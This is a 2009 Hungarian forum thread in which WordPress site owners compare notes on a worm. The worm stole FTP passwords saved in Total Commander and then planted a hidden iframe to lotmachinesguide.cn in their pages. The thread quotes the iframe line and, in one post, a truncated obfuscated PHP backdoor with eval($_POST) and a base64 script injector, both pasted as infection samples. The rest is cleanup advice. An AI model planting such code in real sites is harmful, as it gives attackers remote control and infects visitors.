lotmachinesguide.cn iframe

djzone · 2009. április 11. 18:25

Nos, ma délután 5 körül vettem észre, hogy a WordPress MU oldalam adminja elkezdett meghalogatni, és egyik ajaxos dolog sem működitt az admin felületen, pedig ugye van jó pár.

Majd megnéztem a csodás firebugommal, és a címben említett URLről töltött be valamit a böngészőm. Először azt hittem, hogy a gépem vírusos, és minden oldalkéréskor indít egy plusz kérést is.

A probléma összetettebb volt, mivel egy eddig számomra ismeretlen féreg férkőzött be a gépembe, ami lenyúlta az összes Total Commanderben tárolt ftp elérésem (szerencsére csak pár darab volt, mind saját oldal). Majd felkapcsolódtak különböző reverz nélküli hosztokról a távol-keletről, és letöltötték a teljes tartalmat. Ezután minden .html oldalba (wp-super-cache o/), és pár .php állományba beillesztettek egy ilyen kódsort:

Code:

< iframe src="http://lotmachinesguide.cn/in.cgi?income58" width=1 height=1 style="visibility: hidden">

Majd visszatöltötték a szerveremre...

A cachet ürítettem, és a az érintett fájlokban lecseréltem a kódokat, valamit ftp jelszavakat cseréltem, és egy Spybots Search & Destroy lett a barátom. Igazából nem tudom honnét mászott fel, de ismét valami kedves JAVA appletre gyanakszom, mint pár párszor a múltban ez megtörtént...

Remélem ez titeket elkerül, nekem ráment kb fél órám mire leszámoltam vele.

Lassan tényleg valami asztali unixra fogok váltani, mert ez már non-szensz...

efrud · 2009. április 11. 18:37

szerencse, hogy fél óra alatt kész voltál és nem lett nagyobb gond. A varnyú mondja a szemére hogy csecsebogyó annak, aki ilyet kitalál…

patai · 2009. április 12. 06:29

Uh belefutottam én is… mármint egy barátom oldalát törték így

patai · 2009. április 12. 07:05

Ezért kell fejben tárolni a jelszókat.

UNIX like rendszeren is előfordulhat ilyen, ha a programban tárolod a jelszót.

djzone · 2009. április 12. 09:49

Három évig használtam desktopként freebsdt, a kompatibilitási dolgokkal együtt is negyed annyi gondom volt vele, mint bármelyik microsoft cuccal.

kratka · 2009. április 12. 15:03

Jo lehet az idegrendszered… Van egy egesz jo titkosito program, TrueCrypt a neve. Megirtak Macira es Linuxra is. Szinte barmit titkosit, barmilyen file-ba alcazva, jelszoval es kulcsosan. (Bovebben: http://www.google.hu/search?q=truecrypt)

patai · 2009. április 13. 17:14

Szemezgetek egy asztali MAC-el most nagyon bejön. Ott nem lesz ilyen gond, bár évek óta NOD32-t használok és lekopogom, ez idő alatt nem volt vírusom

viktorio · 2009. április 14. 06:21

Kissé hasonlít trojanclicker iframe nag trojan-hoz, az is magától kapcsolódik ftp-n a tárhelyhez.

djzone · 2009. április 20. 11:41

'Patai wrote:

Szemezgetek egy asztali MAC-el most :) nagyon bejön. Ott nem lesz ilyen gond' date=' bár évek óta NOD32-t használok és lekopogom, ez idő alatt nem volt vírusom :D[/quote']

Tegnap írt az egyik MAC-es barátom, hogy az ő oldalukra is felkerült ez az iframes geci, és mindketten a szerkesztők csak és kizárólag MAC-en dolgoznak. Szóval már nem vagyok egészen biztos a terjedési módban sem...

farkasgyozo · 2009. április 21. 08:25

Kratka wrote:

Jo lehet az idegrendszered...

Mindenfajta titkosító, elrejtő, és egyéb hasonló programokkal egy óriási bajom van: legelsőnek én felejtem el a szupertitkos, szupernehéz master jelszavamat... :(

A jó hír: minden rendszertelepítésnél (formatáláskor) a szupertitkos adataim helyén lesz egy csomó felszabadult helyem... :)

kratka · 2009. április 21. 09:12

Az elfelejtest meg tudom erteni Amit emlitettem programot, pl nem is enged 20 karakternel kevesebbet hasznalni a jelszohoz. De szerintem meg akkoris biztonsagosnak mondhato ha felirod valahova a jelszot, hogy ne felejtsd el. (A privat-nyilvanos kulcs azonositas miatt.)

A jo hirt ugy erted, hogy telepitesnel elveszhet a tikos helyed? Mert az ilyesmit szerintem jobb nem helyileg tarolni. Viszont csinalhat az ember barmit, mert sajna mindig lesznek olyanok, akik jo penzert pl ilyen hulye iframe-s scriptet gyartanak :S De talan egy probat barmi meger a megelozesre.

pockone · 2009. április 24. 18:50

Én is belefutottam ma ebbe.

Kiszedtem az index.php ből az iframe-es kódot erre visszakerült.

DjZoNe: hogy sikerült leírtani? Az a baj nincs hozzáférésem a szerverhez jelszó módosítás ügyileg úgyhogy nekem sajna nem fél óra lesz.

A terjedésről tudsz valamit? Aki megnyitja így az oldalt az be is szívja a vírust?

Mert nekem a NOD32 riasztott így vettem észre.

Mondjuk nekem a cím más lett.

Adnék linket de nem teszem emrt nem akarom hogy terjedjen így is épp elég az oldal látogatottsága.

farkasgyozo · 2009. április 24. 19:32

Krtka!

Úgy értettem a jó hírt, hogy mivel nem tudok hozzáférni a titkos adataimhoz, mert annyira eltitkosítottam, és az ott foglalja a HDD-n a helyet, akkor a legközelebbi formatáláskor fel fog szabadulni egy csomó helyem, amit újra tudok hasznosítani.

aboy · 2009. május 6. 09:18

sziasztok

pár helyen azt olvastam hogy fertőzött PDF ill. SWF állományokon keresztül mászik fel a trójai a kliensekre (pl. az Adobe Reader elég későn javított hibáját kihasználva), és ott az eltárolt ftp jelszavak segítségével irogat a szervereken lévő php ill. html állományokba

nemrég egyébként egy ügyfélnél egy továbbfejlesztett változatot találtam, már nem csak html kódot irogat, hanem ha php-ről van szó, akkor egy echo “<iframe…”; sort szúr be

nálatok megoldódott a probléma, sikerült leírtani a kliensekről?

üdv

e-d · 2009. május 6. 09:34

Nálam kicsit fejlettebb változat ütötte fel a fejét… Többek közt ilyen kódokat is nyomott php-file-okba:

Code:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST))eval($_POST);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciB2NTVvPSd2YXI+MjBhPjNkPjIyPjUzY3I+NjlwdEU+NmVnaW4+NjU+MjI+MmM+NjI+M2Q+MjJWZXJzaT42Zm4oKSs+MjI+MmNqPjNkPjIyPjIyPjJjPjc1PjNkbmF2aT42Nz42MXRvcj4yZXVzPjY1ckFnZW50PjNiaWYoKHU+MmVpbmRlPjc4PjRmZig+MjJXaW4+MjIpPjNlMCk+MjY+MjY+Mjh1PjJlPjY5bmQ+NjV4T2Y+Mjg+MjJOVD4yMDY+MjI+Mjk+M2MwKT4yNj4yNj4yOGRvYz43NT42ZGVudD4yZWNvPjZmPjZiaWU+MmVpbj42NGV4Tz42Nig+MjJtPjY5ZT42Yj4zZDE+MjIpPjNjMD4yOT4yNj4yNig+NzQ+NzlwZT42ZmY+Mjh6cnZ6dD43Myk+MjE+M2Q+NzQ+NzlwZW9mKD4yMkE+MjIpKT4yOT43Ynpydj43YXRzPjNkPjIyQT4yMj4zYmV2YT42Yyg+MjI+NjlmPjI4d2k+NmVkbz43Nz4yZT4yMithPjJiPjIyKWo+M2Q+NmE+MmI+MjI+MmI+NjErPjIyTWE+NmFvcj4yMitiK2ErPjIyTWlub3I+MjIrYithKz4yMj40MnU+Njk+NmNkPjIyK2I+MmI+MjJqPjNiPjIyKT4zYmRvPjYzdW0+NjVudD4yZXdyPjY5dD42NSg+MjI+M2NzPjYzcmlwPjc0PjIwc3JjPjNkPjJmPjJmZz43NW0+NjJsYXI+MmVjPjZlPjJmcnNzPjJmPjNmaWQ+M2Q+MjIrais+MjI+M2U+M2M+NWM+MmZzY3I+Njk+NzA+NzQ+M2U+MjI+Mjk+M2I+N2QnO3ZhciBHMXBFPXVuZXNjYXBlKHY1NW8ucmVwbGFjZSgvPi9nLCclJykpO2V2YWwoRzFwRSl9KSgpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)#is',$s,$a))foreach($a[0] as $v)if(count(explode("n",$v))>5){$e=preg_match('#[^s'".,;?![]:/()]{30,}#',$v)||preg_match('#[([](s*d+,){20,}#',$v);if((preg_match('#bevalb#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('##','',$s);if(stristr($s,'<body'))$s=preg_replace('#(s*<body)#mi',TMP_XHGFJOKL.'1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,''))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v)=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i

Remélem nem futok össze vele megint... Az tuti, hogy mindenkit letiltok az ftp jelszó TC-vel való megjegyeztetéséről...

Adatbázisban nem talált senki semmi rendelleneset? Abba nem nyúlt bele nálatok?

aboy · 2009. május 6. 10:03

a mindenit! ez egyre komolyabb. adatbázis módosítást még nem észleltem.

viktorio · 2009. május 7. 06:06

Na én már 1 még fejlettebb változattal találkoztam.

Nemcsak az index file-okat írja felül, hanem a functions és a config nevű php-kat is legyen az a wp motor vagy 1 sima plugin.

Pl. NextGEN Gallery-ben config php is meg functions is.

viktorio · 2009. május 7. 06:08

a readme azaz az olvasd el html-t is megbuherálja

e-d · 2009. május 7. 12:49

viktorio wrote:

Na én már 1 még fejlettebb változattal találkoztam.

Nemcsak az index file-okat írja felül, hanem a functions és a config nevű php-kat is legyen az a wp motor vagy 1 sima plugin.

Pl. NextGEN Gallery-ben config php is meg functions is.

Ja, ez nálam is jelentkezett!

Sőt: Voltak üres mappáim, amibe fogta és létrehozott file-okat! Főleg images nevű mappákban csinálta ezt...

aboy · 2009. május 11. 11:10

tartsuk életben ezt a topikot, ezek nagyon jó tippek, pl ez a fájl létrehozós dolog nekem is új volt.

egy tipp: ha hozzáfértek az ftpd napló állományához, és tudjátok melyik user módosította a fájlokat, viszonylag könnyen össze lehet gyűjteni a módosított állományok listáját, ha rákerestek a userre a naplóban (pl: grep usernev /var/log/transfer.log). Persze csak bizonyos esetekben működik, de akkor megbízható.

ha bárki találkozik hasonlóval jelezze!